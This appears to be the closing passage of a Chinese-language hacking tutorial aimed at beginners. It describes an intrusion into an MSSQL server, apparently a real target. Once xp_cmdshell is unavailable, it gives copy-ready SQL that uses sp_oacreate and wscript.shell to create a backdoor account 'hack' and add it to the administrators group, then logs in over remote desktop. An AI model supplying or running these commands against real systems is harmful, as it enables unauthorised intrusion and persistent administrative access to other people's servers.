晕,xplog70.dll被删了,可恶,既然开了3389只要加个用户就可以了,加用户也不一定要用XP_cmdshell,可以试试别的转储过程,打开"SQL查询分析器分离版本"输入IP和密码点连接,图19
OK,我们在“查询”中输入:
------------------------------------------------
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true'
-----------------------------------------------
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true'
--------------------------------------------------
这个就是增加一个hack的用户密码也是hack,再提升为管理员权限,图20
怎么样?是不是条条大路通罗马?
用增加的用户登陆3389看看(图21)
哈哈,成功!任务完成!^_^
四.小结
由于篇幅问题还有很多入侵的过程没有写出来,这里写的是主要的入侵过程了,文章读起来很简单(我在实际中可是遇到很多问题),但要是你实际操作起来可能就会遇到很多问题了,想告诉广大菜鸟朋友:真正的技术是实践出来的不是看出来的。这里不仅给大家展示的是一次入侵过程更想把入侵中分析问题的思想传达给各位菜鸟朋友们,由于我水平有限可能文章有很多不足之处,所以还请各位见笑了!